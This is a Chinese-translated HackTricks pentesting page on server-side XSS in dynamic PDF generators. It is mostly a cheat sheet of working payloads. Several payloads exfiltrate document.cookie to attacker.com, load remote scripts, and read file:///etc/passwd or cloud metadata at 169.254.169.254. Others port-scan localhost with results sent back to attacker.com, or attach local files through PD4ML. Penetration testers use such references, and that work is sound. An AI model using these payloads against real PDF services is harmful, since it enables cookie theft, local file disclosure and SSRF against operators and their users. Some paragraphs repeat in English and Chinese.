hacktricks/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
2023-08-03 19:12:22 +00:00

11 KiB
Raw Blame History

服务器端 XSS动态 PDF

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

服务器端 XSS动态 PDF

如果一个网页使用用户可控输入创建 PDF你可以尝试欺骗创建 PDF 的机器人执行任意的 JS 代码
因此,如果PDF 创建机器人发现某种HTML 标签,它会解释它们,你可以滥用这种行为来引发服务器端 XSS

请注意,<script></script> 标签并不总是有效,所以你需要一种不同的方法来执行 JS例如滥用 <img )。
此外,注意在常规的利用中,你将能够查看/下载创建的 PDF,因此你将能够看到你通过 JS 编写的所有内容(例如使用 document.write() )。但是,如果你无法看到创建的 PDF你可能需要通过向你发出的网络请求提取信息(盲目)。

流行的 PDF 生成工具

  • wkhtmltopdf这是一个使用 WebKit 渲染引擎将 HTML 和 CSS 转换为 PDF 文档的开源命令行工具。
  • TCPDF一个用于生成支持各种功能(包括图像、图形和加密)的 PDF 文档的 PHP 库。
  • PDFKit一个可以用于从 HTML 和 CSS 生成 PDF 文档的 Node.js 库。
  • iText一个基于 Java 的用于生成 PDF 文档的库,支持一系列功能,包括数字签名和表单填充。
  • FPDF一个用于生成 PDF 文档的轻量级且易于使用的 PHP 库。

攻击载荷

发现

<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">

SVG

可以在此SVG负载中使用以下任何先前的负载。一个访问Burpcollab子域的iframe和另一个访问元数据端点的iframe被用作示例。

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>


<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>

您可以在https://github.com/allanlw/svg-cheatsheet中找到许多其他SVG有效载荷。

路径泄露

<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>

加载外部脚本

利用这个漏洞的最佳方式是滥用漏洞,使机器人在本地加载你控制的脚本。然后,你将能够在本地更改有效载荷,并使用相同的代码使机器人每次都加载它。

<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>

读取本地文件 / SSRF

{% hint style="warning" %} 将 file:///etc/passwd 更改为 http://169.254.169.254/latest/user-data 作为示例,尝试访问外部网页SSRF

如果允许 SSRF但是无法访问感兴趣的域名或 IP查看此页面以获取可能的绕过方法。 {% endhint %}

<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd>" width="400" height="400">
<style><iframe src="file:///etc/passwd">
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

机器人延迟

In some cases, web applications implement a delay mechanism to prevent automated bots from performing actions too quickly. This delay can be implemented in various ways, such as adding a time delay between requests or requiring users to solve a CAPTCHA before proceeding.

在某些情况下Web应用程序会实施延迟机制以防止自动化机器人过快执行操作。这种延迟可以通过多种方式实现例如在请求之间添加时间延迟或要求用户在继续之前解决验证码。

<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">

端口扫描

A port scan is a technique used to identify open ports on a target system. It involves sending network packets to different ports and analyzing the responses to determine which ports are open and potentially vulnerable to attack.

端口扫描是一种用于识别目标系统上开放端口的技术。它涉及向不同的端口发送网络数据包,并分析响应以确定哪些端口是开放的,并且可能容易受到攻击。

<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}

for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">

SSRF

这个漏洞可以很容易地转化为SSRF因为你可以让脚本加载外部资源。所以尝试利用它读取一些元数据

附件PD4ML

有一些HTML转PDF的引擎可以指定PDF的附件,比如PD4ML。你可以滥用这个功能来附加任何本地文件到PDF中。
为了打开附件,我使用Firefox打开文件并双击纸夹符号存储附件为一个新文件。
使用Burp捕获PDF响应也应该在PDF中以明文形式显示附件

{% code overflow="wrap" %}

<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>

参考资料

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥